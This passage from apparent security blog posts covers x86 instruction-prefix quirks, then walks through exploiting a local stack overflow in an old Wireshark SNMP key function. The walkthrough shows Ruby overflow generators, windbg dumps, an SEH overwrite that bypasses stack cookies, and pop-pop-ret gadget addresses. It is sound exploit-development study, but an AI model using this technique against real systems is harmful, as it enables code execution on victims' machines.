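        encodings.append(bytes([0x8B, 0x04, sib]))
    return encodings


if __name__ == "__main__":
    for enc in mov_eax_deref_eax_encodings():
        print(enc.hex())
```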

being a bully


Now is where we start going into undefined territory.

Certain prefixes are only supposed to be used with certain instructions, and certain prefixes only make sense when certain types of operands are used. For example, if a modR/M byte isn't used, the 0x67 prefix usually has no effect:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
           67 | 58     |       |     |          |          | pop eax
However, sometimes the 0x67 prefix _does_ do something without a modR/M byte (thanks to MazeGen in the comments):
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | a1     |       |     | 10203040 |          | mov eax,dword ptr ds:[40302010]
           67 | a1     |       |     | 1020     |          | mov eax,dword ptr ds:[00002010]
The 0x2e and 0x3e (branch not taken/taken) prefixes are also intended only to be used with Jcc instructions. If they are used with another type of instruction, what happens? You guessed it, nothing:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
           2e | 58     |       |     |          |          | pop eax
           3e | 58     |       |     |          |          | pop eax
There is a caveat to using 0x2e and 0x3e as "nop" prefixes. If the instruction dereferences something, then the 0x2e or 0x3e prefix will then be used as a CS or DS segment override:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 00    |     |          |          | mov eax,dword ptr[eax]
           2e | 8b     | 00    |     |          |          | mov eax,dword ptr cs:[eax]
           3e | 8b     | 00    |     |          |          | mov eax,dword ptr ds:[eax]
One other prefix that can potentially be useful is the lock prefix (0xf0). The lock prefix can only be used with the add, adc, and, btc, btr, bts, cmpxchg, cmpxchg8b, dec, inc, neg, not, or, sbb, sub, xor, xadd, and xchg opcodes, and then only if the destination operand is a memory operand. What does it do though? According to Intel, the lock prefix "forces an operation that ensures exclusive use of shared memory in a multiprocessor environment". Within those restrictions on instructions and operand types, the lock prefix can also be used to create another representation of an instruction.

being a bully*4


Earlier in this post I mentioned that up to four prefixes are allowed on an instruction, and that they can be in any order. This also applies to the "nop" prefixes: they can be in any order, but they can also be repeated:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
           67 | 58     |       |     |          |          | pop eax
         6767 | 58     |       |     |          |          | pop eax
       676767 | 58     |       |     |          |          | pop eax
     67676767 | 58     |       |     |          |          | pop eax
           67 | 58     |       |     |          |          | pop eax
         6766 | 58     |       |     |          |          | pop ax
       673e67 | 58     |       |     |          |          | pop eax
     3e66672e | 58     |       |     |          |          | pop ax
If you take a look at this in windbg, you'll notice that it doesn't know how to disassemble the instruction. I'm assuming this is because windbg thinks that only one unique prefix is allowed per instruction:
0100c38c 67              ???
0100c38d 67              ???
0100c38e 67              ???
0100c38f 6758            pop     eax
Even though windbg doesn't know how to disassemble it (I haven't tested olly, ida, or other debuggers yet), the instruction still executes just fine. This also goes for the lock+rep prefix combination example that I used earlier.

being a bully*14


Being a bully times 14? No way, you say. YES WAY. I decided to test the "rule" about having only four prefixes. It's a lie! In my testing, I was able to add up to fourteen prefixes before I started getting errors. Below are some examples:
                    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
                --------------+--------+-------+-----+----------+----------+--------
 6767676767676767676767676767 | 58     |       |     |          |          | pop eax
 673e2e673e2e673e2e673e2e6767 | 58     |       |     |          |          | pop eax
 
 windbg disassembly:
 0100c3a2 67              ???
 0100c3a3 67              ???
 0100c3a4 67              ???
 0100c3a5 67              ???
 0100c3a6 67              ???
 0100c3a7 67              ???
 0100c3a8 67              ???
 0100c3a9 67              ???
 0100c3aa 67              ???
 0100c3ab 67              ???
 0100c3ac 67              ???
 0100c3ad 67              ???
 0100c3ae 67              ???
 0100c3af 6758            pop     eax
I did some additional testing on these extra prefixes, thinking that maybe anything before the last four prefixes doesn't get applied and can be any prefix, regardless of compatibility. It turns out this is not the case. All of the same rules still apply to all 14 prefixes.
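
One plausible explanation for the cutoff at fourteen is the 15-byte maximum instruction length documented in the Intel manuals: fourteen one-byte prefixes plus the one-byte `pop eax` opcode is exactly 15 bytes. The testing above did not confirm that this is the cause, so treat the Python sketch below as an assumption; `pad_with_prefixes` and `MAX_INSTRUCTION_LENGTH` are names invented for this example.

```python
# Documented x86 limit; assumed (not verified here) to explain the 14-prefix cutoff.
MAX_INSTRUCTION_LENGTH = 15


def pad_with_prefixes(instruction: bytes, count: int, prefix: int = 0x67) -> bytes:
    """Prepend `count` copies of a prefix byte, refusing to exceed 15 bytes."""
    padded = bytes([prefix]) * count + instruction
    if len(padded) > MAX_INSTRUCTION_LENGTH:
        raise ValueError("instruction would be %d bytes long" % len(padded))
    return padded


if __name__ == "__main__":
    pop_eax = bytes([0x58])
    print(pad_with_prefixes(pop_eax, 14).hex())   # fourteen 67 bytes, then 58
    try:
        pad_with_prefixes(pop_eax, 15)
    except ValueError as err:
        print("rejected:", err)
```

Under this assumption, an instruction with a longer opcode or with operands would leave room for fewer "nop" prefixes.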

Crazy stuff, huh? The biggest thing I learned from this is to question everything. I'm not used to having to question my disassembler too much. That's something I've been able to trust up to this point, at least for disassembling _one_instruction_. I almost missed seeing most of this behavior because the first few times I saw windbg fail to disassemble a single instruction, I thought it meant that it wouldn't execute. Luckily, I stepped (a literal hit-F10-and-execute-the-next-instruction step) through it anyways and noticed this behavior.

One other thing to note is that this isn't the first time somebody has run across the multiple-prefixes behavior. A quick conversation with Mark Dowd made it apparent that this behavior is pretty well-known, that different processors may allow even more than 14 prefixes, and that there are major differences in how emulators and native clients execute instructions.

I have other ideas for some more potentially interesting research in this area, but this is all for now. Laters.

Friday, November 5, 2010

Exploit-Dev Practice or Why You Shouldn't Copy-Paste

I've recently taken a break from one of my current personal side projects to practice some open-source bug hunting and exploit-dev. The bug I've found and am going to explain in this post is rather useless (it's not remotely exploitable), but it was a good exercise nonetheless. Since you can't remotely pwn somebody else with it without social engineering, I'm not waiting till it gets patched either :^) So, on with the show...

The bug I found is a simple one in wireshark. You can check out the latest code from wireshark with:
svn co http://anonsvn.wireshark.org/wireshark
Also, for most of my examples, I used one of the recent dev wireshark builds because you can get the pdbs for them. You could go to http://www.wireshark.org/download/automated/win32/ and download a more recent version of the exe and pdbs if you want (wireshark doesn't archive all of the dev builds it makes). The vulnerable code is in epan/dissectors/packet-snmp.c in the snmp_usm_password_to_key_sha1 function. Can you spot the problem?
3057 /*
3058    SHA1 Password to Key Algorithm COPIED from RFC 3414 A.2.2
3059  */
3060 
3061 static void
3062 snmp_usm_password_to_key_sha1(const guint8 *password, guint passwordlen,
3063                   const guint8 *engineID, guint engineLength,
3064                   guint8 *key)
3065 {
3066     sha1_context     SH;
3067     guint8     *cp, password_buf[72];
3068     guint32      password_index = 0;
3069     guint32      count = 0, i;
3070 
3071     sha1_starts(&SH);   /* initialize SHA */
3072 
3073     /**********************************************/
3074     /* Use while loop until we've done 1 Megabyte */
3075     /**********************************************/
3076     while (count < 1048576) {
3077         cp = password_buf;
3078         for (i = 0; i < 64; i++) {
3079             /*************************************************/
3080             /* Take the next octet of the password, wrapping */
3081             /* to the beginning of the password as necessary.*/
3082             /*************************************************/
3083             *cp++ = password[password_index++ % passwordlen];
3084         }
3085         sha1_update (&SH, password_buf, 64);
3086         count += 64;
3087     }
3088     sha1_finish(&SH, key);
3089 
3090     /*****************************************************/
3091     /* Now localize the key with the engineID and pass   */
3092     /* through SHA to produce final key                  */
3093     /* May want to ensure that engineLength <= 32,       */
3094     /* otherwise need to use a buffer larger than 72     */
3095     /*****************************************************/
3096     memcpy(password_buf, key, 20);
3097     memcpy(password_buf+20, engineID, engineLength);
3098     memcpy(password_buf+20+engineLength, key, 20);
3099 
3100     sha1_starts(&SH);
3101     sha1_update(&SH, password_buf, 40+engineLength);
3102     sha1_finish(&SH, key);
3103     return;
3104  }
Besides the actual vuln, I was surprised that this function was copied from an RFC, with few modifications. This is what it looks like in RFC 3414 A.2.2:
   void password_to_key_sha(
      u_char *password,    /* IN */
      u_int   passwordlen, /* IN */
      u_char *engineID,    /* IN  - pointer to snmpEngineID  */
      u_int   engineLength,/* IN  - length of snmpEngineID */
      u_char *key)         /* OUT - pointer to caller 20-octet buffer */
   {
      SHA_CTX     SH;
      u_char     *cp, password_buf[72];
      u_long      password_index = 0;
      u_long      count = 0, i;

      SHAInit (&SH);   /* initialize SHA */

      /**********************************************/
      /* Use while loop until we've done 1 Megabyte */
      /**********************************************/
      while (count < 1048576) {
         cp = password_buf;
         for (i = 0; i < 64; i++) {
             /*************************************************/
             /* Take the next octet of the password, wrapping */
             /* to the beginning of the password as necessary.*/
             /*************************************************/
             *cp++ = password[password_index++ % passwordlen];
         }
         SHAUpdate (&SH, password_buf, 64);
         count += 64;
      }
      SHAFinal (key, &SH);          /* tell SHA we're done */

      /*****************************************************/
      /* Now localize the key with the engineID and pass   */
      /* through SHA to produce final key                  */
      /* May want to ensure that engineLength <= 32,       */
      /* otherwise need to use a buffer larger than 72     */
      /*****************************************************/
      memcpy(password_buf, key, 20);
      memcpy(password_buf+20, engineID, engineLength);
      memcpy(password_buf+20+engineLength, key, 20);

      SHAInit(&SH);
      SHAUpdate(&SH, password_buf, 40+engineLength);
      SHAFinal(key, &SH);
      return;
   }
What really surprised me though was that the comments in the code actually warn about the vuln.
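
The limit in that comment is plain arithmetic: the 72-byte buffer has to hold two 20-byte copies of the key plus the engineID. A minimal sketch of the bound (the constant and method names are mine, not from the Wireshark source):

```ruby
# Sizes taken from the function above; the names are illustrative only.
PASSWORD_BUF_SIZE = 72  # guint8 password_buf[72]
SHA1_KEY_LEN      = 20  # each memcpy of key copies 20 bytes

# Largest engineLength for which key + engineID + key still fits.
MAX_ENGINE_LENGTH = PASSWORD_BUF_SIZE - 2 * SHA1_KEY_LEN

# True when the three memcpy calls together would write past password_buf.
def overflows?(engine_length)
  SHA1_KEY_LEN + engine_length + SHA1_KEY_LEN > PASSWORD_BUF_SIZE
end

puts MAX_ENGINE_LENGTH  # 32, the limit mentioned in the comment
puts overflows?(32)     # false
puts overflows?(33)     # true
```

Nothing in the function enforces that limit, so the caller's engineLength is trusted as-is.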

Yes, the vuln is on line 3097 where the engineID is copied into the password_buf. If an engineID is longer than the 32 bytes the comment allows for, the copies on lines 3097 and 3098 run past the end of the 72-byte password_buf. But what actually uses this function? (Like I mentioned earlier, it's not remotely exploitable, so don't get your hopes up :^) Calls to this function end up having call stacks like this:
0:000> k
ChildEBP RetAddr  
0012fb88 008bee28 libwireshark!snmp_usm_password_to_key_sha1
0012fba8 008c07af libwireshark!set_ue_keys+0x58
0012fbc0 008c060a libwireshark!ue_se_dup+0x10f
0012fbdc 006e017a libwireshark!renew_ue_cache+0x5a
0012fbe8 006d19a3 libwireshark!uat_load+0x18a
0012fc04 0069faad libwireshark!uat_load_all+0x53
0012fc44 0069ff59 libwireshark!init_prefs+0x6d
0012fc58 00420673 libwireshark!read_prefs+0x19
0012fcb4 0041e5c8 wireshark!read_configuration_files+0x23
0012ff18 00420a81 wireshark!main+0x6b8
0012ff30 00521bae wireshark!WinMain+0x61
0012ffc0 7c817067 wireshark!__tmainCRTStartup+0x140
0012fff0 00000000 kernel32!BaseProcessStart+0x23
This function is responsible for creating a key based on a sha1 hash of a password that is configured by the user in the wireshark preferences. It is called when wireshark is opened, regardless of whether it is opening a pcap or capturing network traffic. The key is then supposed to be used to help decode SNMP traffic. You can configure preferences through the wireshark UI by going to
Edit->Preferences->Protocols->SNMP->Users Table (Edit...)
and adding a new user/password, or you can directly edit the preferences file at
WINDOWS: %APPDATA%\Wireshark\snmp_users
   *NIX: ~/.wireshark/snmp_users
Note: this only works with sha1 hashes. So, you know the vuln, now a quick run-through on how to exploit it. First off, let's see what the classic "A" * a-whole-bunch looks like. I used this to generate the snmp_users file:
File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write("A" * 200 + ',"username","SHA1","password","DES","password"' + "\n")
end
After setting windbg to be the postmortem debugger (use `windbg -I` to set it), this is what I see when wireshark opens and dies:
(370.90): Access violation - code c0000005 (!!! second chance !!!)
eax=00000002 ebx=00000000 ecx=00000012 edx=00000002 esi=aaaaaaaa edi=aabda5ee
eip=7855aee6 esp=0012faac ebp=0012fab4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Wireshark\MSVCR90.dll - 
MSVCR90!memcpy+0xc6:
7855aee6 8a06            mov     al,byte ptr [esi]          ds:0023:aaaaaaaa=??
The stack trace is:
0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fab4 008bfd3a aabda5ee aaaaaaaa 00000014 MSVCR90!memcpy+0xc6
0012fb88 aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa libwireshark!snmp_usm_password_to_key_sha1+0xea
0012fba8 008c07af 04e71000 04e71054 04e7104c 0xaaaaaaaa
0012fbc0 008c060a 042ed2b8 006df61e 03361b38 libwireshark!ue_se_dup+0x10f
0012fbdc 006e017a 042ed548 0012fc04 006d19a3 libwireshark!renew_ue_cache+0x5a
0012fbe8 006d19a3 0400c510 0012fbfc 0400c510 libwireshark!uat_load+0x18a
0012fc04 0069faad 0133439c 013343a4 013343b0 libwireshark!uat_load_all+0x53
0012fc44 0069ff59 0015233b 00000002 00564944 libwireshark!init_prefs+0x6d
0012fc58 00420673 0012fca4 0012fca8 0012fc80 libwireshark!read_prefs+0x19
0012fcb4 0041e5c8 0012fd0c 0012fd64 00000050 wireshark!read_configuration_files+0x23
0012ff18 00420a81 00000001 02c63fc8 00000008 wireshark!main+0x6b8
0012ff30 00521bae 00400000 00000000 0015233b wireshark!WinMain+0x61
0012ffc0 7c817067 0142d8b0 00000018 7ffd4000 wireshark!__tmainCRTStartup+0x140
0012fff0 00000000 00521d8d 00000000 78746341 kernel32!RegisterWaitForInputIdle+0x49
As you can see from the aaaaaaaa values in the libwireshark!snmp_usm_password_to_key_sha1 frame, we've overwritten our return address, as well as some of the current and previous function's arguments, with our engineID data. The reason we didn't see an exception like this
(304.7a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0165ef54 ebx=00000000 ecx=008bfc50 edx=04e71000 esi=00151f0a edi=005fe5cc
eip=aaaaaaaa esp=0012fb8c ebp=0012fba8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010202
aaaaaaaa ??              ???
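is that wireshark was compiled with the /GS flag, meaning that there are stack cookies, as you can see below in the __security_cookie load at the top of the function and the __security_check_cookie call just before it returns: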
libwireshark!snmp_usm_password_to_key_sha1:
008bfc50 55              push    ebp
008bfc51 8bec            mov     ebp,esp
008bfc53 81ecc0000000    sub     esp,0C0h
008bfc59 a118802102      mov     eax,dword ptr [libwireshark!__security_cookie (02218018)]
008bfc5e 33c5            xor     eax,ebp
008bfc60 8945f0          mov     dword ptr [ebp-10h],eax
008bfc63 c745a400000000  mov     dword ptr [ebp-5Ch],0
008bfc6a c745fc00000000  mov     dword ptr [ebp-4],0
008bfc71 8d8540ffffff    lea     eax,[ebp-0C0h]
008bfc77 50              push    eax
008bfc78 e88310e3ff      call    libwireshark!sha1_starts (006f0d00)
...
008bfd63 83c40c          add     esp,0Ch
008bfd66 8b4d18          mov     ecx,dword ptr [ebp+18h]
008bfd69 51              push    ecx
008bfd6a 8d9540ffffff    lea     edx,[ebp-0C0h]
008bfd70 52              push    edx
008bfd71 e85a2ee3ff      call    libwireshark!sha1_finish (006f2bd0)
008bfd76 83c408          add     esp,8
008bfd79 8b4df0          mov     ecx,dword ptr [ebp-10h]
008bfd7c 33cd            xor     ecx,ebp
008bfd7e e85d817b00      call    libwireshark!__security_check_cookie (01077ee0)
008bfd83 8be5            mov     esp,ebp
008bfd85 5d              pop     ebp
008bfd86 c3              ret
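
The prologue and epilogue above boil down to a couple of XORs. Here is a rough model of the check in Ruby. The cookie value and the method names are made up for illustration (the real cookie is chosen at runtime), and EBP is the frame pointer seen in the stack traces:

```ruby
# Hypothetical cookie value; EBP is taken from the kb output above.
SECURITY_COOKIE = 0x1badc0de
EBP             = 0x0012fb88

# Prologue: mov eax,[__security_cookie]; xor eax,ebp; mov [ebp-10h],eax
def prologue_slot(cookie, ebp)
  cookie ^ ebp
end

# Epilogue: mov ecx,[ebp-10h]; xor ecx,ebp; call __security_check_cookie
def cookie_intact?(slot, cookie, ebp)
  (slot ^ ebp) == cookie
end

slot = prologue_slot(SECURITY_COOKIE, EBP)
puts cookie_intact?(slot, SECURITY_COOKIE, EBP)        # untouched slot passes
puts cookie_intact?(0x90909090, SECURITY_COOKIE, EBP)  # overwritten slot fails
```

The slot at ebp-10h sits below the saved ebp and return address, so a linear overflow that reaches the return address has already clobbered the cookie by the time the function returns.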
The method I used to get around this is the classic overwrite-an-SEH-handler-with-an-address-to-a-pop-pop-ret. I also needed to trigger an exception before the call to __security_check_cookie so that the exception handlers would be called before the cookie was ever checked. The first thing I needed to figure out was how long the engineID needed to be in order to overwrite the SEH address on the stack. You can view the SEH chain in windbg like this:
0:000> bu libwireshark!snmp_usm_password_to_key_sha1              # set the breakpoint
0:000> g                                                          # continue execution
...
0:000> !exchain                                                   # display the SEH chain
0012ffb0: wireshark!_except_handler4+0 (00522555)
0012ffe0: kernel32!_except_handler3+0 (7c839ac0)
  CRT scope  0, filter: kernel32!BaseProcessStart+29 (7c843882)
                func:   kernel32!BaseProcessStart+3a (7c843898)
Invalid exception stack at ffffffff
!exchain says the address of the next SEH structure is at 0x12ffb0. This means the actual address of the next exception handler is at 0x12ffb4. Knowing the address on the stack that needed to be overwritten (0x12ffb4), all I needed to know before I could calculate the length of the engineID was the start address of the overflowed buffer. This is easy enough to do if you set a breakpoint on the vulnerable memcpy (when I can, I prefer calculating things rather than using metasploit patterns):
0:000> bp 008bfd10
0:000> g
...
# disassembly
008bfd10 83c40c          add     esp,0Ch
008bfd13 8b4514          mov     eax,dword ptr [ebp+14h]
008bfd16 50              push    eax
008bfd17 8b4d10          mov     ecx,dword ptr [ebp+10h]
008bfd1a 51              push    ecx
008bfd1b 8d55bc          lea     edx,[ebp-44h]
008bfd1e 52              push    edx
008bfd1f e8d8817b00      call    libwireshark!memcpy (01077efc)
In my testing, edx (the dst buffer) pointed to 0x12fb44. Thus, the total length to overwrite up to the exception handler address would be 0x12ffb4-0x12fb44 = 0x470 = 1136 bytes. Now, since the data in the engineID is supposed to be a hex value and gets converted from hex into binary data, we'll need twice as many characters, so we'll need an engineID that is 2272 hex characters long to overflow up to (but not including) the pointer to the SEH handler code. New ruby code:
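# hex dword string -> little-endian hex string, e.g. "beefface" -> "cefaefbe"
# (unpack("H*") gives the same result on old and current ruby versions)
def flip_dword(str)
 [str.hex].pack("V").unpack("H*").first
end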

engine_id = "90" * 1136
engine_id += flip_dword("beefface")

File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write(engine_id + ',"username","SHA1","password","DES","password"' + "\n")
end
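
The 1136 used above can be double-checked with a few lines of arithmetic. This is only a sketch using the addresses from my debugging session; the constant names are mine:

```ruby
# Addresses observed in the debugger session above.
SEH_RECORD = 0x0012ffb0  # from !exchain: start of the SEH record
MEMCPY_DST = 0x0012fb44  # edx at the vulnerable memcpy

# An SEH record is two dwords: pointer to the next record, then the handler.
HANDLER_SLOT = SEH_RECORD + 4

PAD_BYTES = HANDLER_SLOT - MEMCPY_DST  # bytes written before the handler
HEX_CHARS = PAD_BYTES * 2              # each byte is two hex characters

puts "handler slot: 0x%08x" % HANDLER_SLOT  # 0x0012ffb4
puts "pad bytes:    #{PAD_BYTES}"           # 1136
puts "hex chars:    #{HEX_CHARS}"           # 2272
```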
Before/after memcpy (break at 008bfd10):
========================== BEFORE ============================     |=========================== AFTER ============================
0012ff88 00000000                                                  |0012ff88 90909090 
0012ff8c 00000000                                                  |0012ff8c 90909090 
0012ff90 ffffffff                                                  |0012ff90 90909090 
0012ff94 ffffffff                                                  |0012ff94 90909090 
0012ff98 ffffffff                                                  |0012ff98 90909090 
0012ff9c 0012ffac                                                  |0012ff9c 90909090 
0012ffa0 00151f0a                                                  |0012ffa0 90909090 
0012ffa4 00000000                                                  |0012ffa4 90909090 
0012ffa8 0012ff48                                                  |0012ffa8 90909090 
0012ffac 70b782cc                                                  |0012ffac 90909090 
0012ffb0 0012ffe0                                                  |0012ffb0 90909090 
0012ffb4 00522555 wireshark!_except_handler4                       |0012ffb4 beefface <--- Overwritten exception handler
0012ffb8 5abbc6d5                                                  |0012ffb8 5abbc6d5 
0012ffbc 00000001                                                  |0012ffbc 00000001 
0012ffc0 0012fff0                                                  |0012ffc0 0012fff0 
0012ffc4 7c817067 kernel32!BaseProcessStart+0x23                   |0012ffc4 7c817067 kernel32!BaseProcessStart+0x23
0012ffc8 00cdf6f2 libwireshark!dissect_hclnfsd_lock_call+0x102     |0012ffc8 00cdf6f2 libwireshark!dissect_hclnfsd_lock_call+0x102
0012ffcc 00cdf776 libwireshark!dissect_hclnfsd_lock_reply+0x76     |0012ffcc 00cdf776 libwireshark!dissect_hclnfsd_lock_reply+0x76
0012ffd0 7ffd5000                                                  |0012ffd0 7ffd5000 
0012ffd4 8054b6b8                                                  |0012ffd4 8054b6b8 
0012ffd8 0012ffc8                                                  |0012ffd8 0012ffc8 
0012ffdc 82188a80                                                  |0012ffdc 82188a80
Just to show that we overwrote the correct SEH pointer in memory, you'll see this error in windbg:
(2e0.434): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=beefface edx=7c9032bc esi=00000000 edi=00000000
eip=beefface esp=0012f6dc ebp=0012f6fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
beefface ??              ???
Now that we've got that working, we've got to make sure we raise an error before the stack cookie is checked. But wait, it just worked, so what error are we raising? The actual error when overflowing mainly with nops is this:
(16c.660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=909090a4 ebx=00000000 ecx=00000005 edx=00000000 esi=90909090 edi=90a38bd4
eip=7855af58 esp=0012faac ebp=0012fab4 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010293
MSVCR90!UnwindUpVec+0x30:
7855af58 8b448eec        mov     eax,dword ptr [esi+ecx*4-14h] ds:0023:90909090=????????
...
0:000> kb
ChildEBP RetAddr  Args to Child              
0012fab4 008bfd3a 90a38bd4 90909090 00000014 MSVCR90!UnwindUpVec+0x30
0012fb88 90909090 90909090 90909090 90909090 libwireshark!snmp_usm_password_to_key_sha1+0xea
...
# disassembly around 008bfd3a
008bfd17 8b4d10          mov     ecx,dword ptr [ebp+10h]
008bfd1a 51              push    ecx
008bfd1b 8d55bc          lea     edx,[ebp-44h]
008bfd1e 52              push    edx
008bfd1f e8d8817b00      call    libwireshark!memcpy (01077efc)
008bfd24 83c40c          add     esp,0Ch
008bfd27 6a14            push    14h
008bfd29 8b4518          mov     eax,dword ptr [ebp+18h]
008bfd2c 50              push    eax
008bfd2d 8b4d14          mov     ecx,dword ptr [ebp+14h]
008bfd30 8d540dbc        lea     edx,[ebp+ecx-44h]
008bfd34 52              push    edx
008bfd35 e8c2817b00      call    libwireshark!memcpy (01077efc)
008bfd3a 83c40c          add     esp,0Ch
What's happening is that we overwrote the "key" parameter to the snmp_usm_password_to_key_sha1 function with nops (\x90). Thus, when the third memcpy is called, it tries to read data from an invalid address (0x90909090):
3096     memcpy(password_buf, key, 20);
3097     memcpy(password_buf+20, engineID, engineLength);
3098     memcpy(password_buf+20+engineLength, key, 20);
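
The register values in the crash line up with that. A small check, assuming the frame layout read off the disassembly (engineLength at ebp+14h, key at ebp+18h, destination base at ebp-44h) and the EBP shown in the stack trace; the constant and method names are mine:

```ruby
EBP      = 0x0012fb88  # ChildEBP of snmp_usm_password_to_key_sha1
DST_BASE = EBP - 0x44  # lea edx,[ebp-44h]
LEN_SLOT = EBP + 0x14  # mov ecx,[ebp+14h]  (engineLength)
KEY_SLOT = EBP + 0x18  # mov eax,[ebp+18h]  (key)

# Arguments of the third memcpy once both slots hold the overflow data.
def third_memcpy_args(fill_dword)
  dst = (DST_BASE + fill_dword) & 0xffffffff  # lea edx,[ebp+ecx-44h]
  src = fill_dword                            # the clobbered key pointer
  [dst, src]
end

puts "engineLength is %d bytes past dst" % (LEN_SLOT - DST_BASE)  # 88
puts "key is %d bytes past dst" % (KEY_SLOT - DST_BASE)           # 92
puts third_memcpy_args(0x90909090).map { |v| "%08x" % v }.join(" ")  # 90a38bd4 90909090
puts third_memcpy_args(0xaaaaaaaa).map { |v| "%08x" % v }.join(" ")  # aabda5ee aaaaaaaa
```

Those pairs are the first two arguments shown for the memcpy frame in the two kb listings above.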
Another possible way to generate an error would be to mess with the engineLength variable, which also comes after the overflowable buffer on the stack. Any way you do it, you just have to trigger some type of exception. The next thing to do is find a useful address that we can overwrite the SEH address with. Before an SEH handler is read from the stack and called, it must pass several checks (checks are made in ntdll!RtlDispatchException). I'd suggest reading this tutorial by corelanc0d3r (or you could just study ntdll!RtlDispatchException). I used msfpescan to find an address in libwireshark.dll that had the instructions pop-pop-ret. Why pop-pop-ret? If you look at the stack right after our exception handler is called, you'll see this:
ntdll!ExecuteHandler2:
7c903282 55              push    ebp
7c903283 8bec            mov     ebp,esp
7c903285 ff750c          push    dword ptr [ebp+0Ch]
7c903288 52              push    edx
7c903289 64ff3500000000  push    dword ptr fs:[0]
7c903290 64892500000000  mov     dword ptr fs:[0],esp
7c903297 ff7514          push    dword ptr [ebp+14h]
7c90329a ff7510          push    dword ptr [ebp+10h]
7c90329d ff750c          push    dword ptr [ebp+0Ch]
7c9032a0 ff7508          push    dword ptr [ebp+8]
7c9032a3 8b4d18          mov     ecx,dword ptr [ebp+18h]
7c9032a6 ffd1            call    ecx {beefface}             <-- calling our exception handler
...
# stack after the call (esp in the memory window in windbg)
0012f6dc 7c9032a8 ntdll!ExecuteHandler2+0x26
0012f6e0 0012f7c4 
0012f6e4 0012ffb0 
0012f6e8 0012f7e0 
0012f6ec 0012f798 
0012f6f0 0012ffb0 
0012f6f4 7c9032bc ntdll!ExecuteHandler2+0x3a
0012f6f8 0012ffb0 
0012f6fc 0012f7ac 
0012f700 7c90327a ntdll!ExecuteHandler+0x24
0012f704 0012f7c4
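
As a quick aside, here is a tiny model of what a pop-pop-ret does with that stack, using only the values from the dump above (the method name is mine):

```ruby
# Top of the stack right after `call ecx`, copied from the dump above.
STACK_AFTER_CALL = [0x7c9032a8, 0x0012f7c4, 0x0012ffb0, 0x0012f7e0]

# Model pop; pop; ret: discard two dwords, then return to the third.
def pop_pop_ret(stack)
  remaining = stack.dup
  2.times { remaining.shift }  # pop reg; pop reg
  remaining.shift              # ret: this value becomes eip
end

puts "eip after pop-pop-ret: 0x%08x" % pop_pop_ret(STACK_AFTER_CALL)
```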
Notice anything familiar about that 0012ffb0 address, third down from the top? That's the address of the SEH structure on the stack, the same one we had overwritten with our nops. Thus, if we point the exception handler to a pop-pop-ret, it will pop the first two dwords off the stack (7c9032a8 and 0012f7c4) and return to the third (0012ffb0), which lands eip in instructions that we control. As I mentioned earlier, I used msfpescan to find the pop-pop-rets for me:
-n4g-[ snmpuser ]-$ msfpescan -p libwireshark.dll 

[libwireshark.dll]
0x10003998 pop esi; pop ebp; ret
0x10008240 pop esi; pop ebp; ret
0x1000a530 pop esi; pop ebp; ret
0x1000b510 pop esi; pop ebp; ret
0x1000b890 pop esi; pop ebp; ret
0x1006cb02 pop esi; pop ebp; ret
0x1006cc09 pop ebx; pop edi; ret
0x1006cc0f pop ebx; pop edi; ret
0x103e8404 pop eax; pop eax; ret
0x104022de pop esi; pop edx; retn 0x83ff
0x104024dd pop edi; pop eax; retn 0x83ff
0x10428a8d pop edi; pop ebp; retn 0x83ff
0x1055b972 pop esi; pop ebp; ret
0x1055bae2 pop esi; pop ebp; ret
0x10696426 pop ebx; pop ebp; ret
0x1070a8ee pop eax; pop ebx; retn 0x8b10
0x10748e94 pop esi; pop ebp; ret
0x10909c11 pop esi; pop ebp; ret
0x109f7e89 pop ecx; pop ecx; ret
0x109f7ed5 pop ecx; pop ebp; retn 0x000c
0x109f8055 pop esi; pop edi; retn 0x0010
0x109f8273 pop esi; pop ebx; retn 0x0010
0x109f856b pop edi; pop esi; ret
0x109f8591 pop edi; pop esi; ret
0x109f8631 pop ebx; pop ebp; ret
Any of the above addresses should work, but if you try and verify them in the disassembler in windbg, you won't see any pop-pop-rets. Why not? The output above was assuming libwireshark.dll started at offset 0x10000000, which it doesn't. To view information about loaded modules in windbg, you could do something like this:
0:000> lml
start    end        module name
00380000 003f6000   libgcrypt_11   (export symbols) ...
00400000 00677000   wireshark   (private pdb symbols) ...
00680000 0262f000   libwireshark C (private pdb symbols) ...
026e0000 026fe000   lua5_1   C (export symbols) ...
685c0000 686be000   libglib_2_0_0   (export symbols) ...
77c10000 77c68000   msvcrt     (pdb symbols) ...
78520000 785c3000   MSVCR90    (private pdb symbols) ...
7c800000 7c8f6000   kernel32   (pdb symbols) ...
7c900000 7c9af000   ntdll      (pdb symbols) ...
You can see that libwireshark starts at offset 0x00680000, and not the 0x10000000 that msfpescan was assuming. This is what it should look like:
-n4g-[ snmpuser ]-$ msfpescan -p libwireshark.dll -I 0x680000

[libwireshark.dll]
0x00683998 pop esi; pop ebp; ret
0x00688240 pop esi; pop ebp; ret
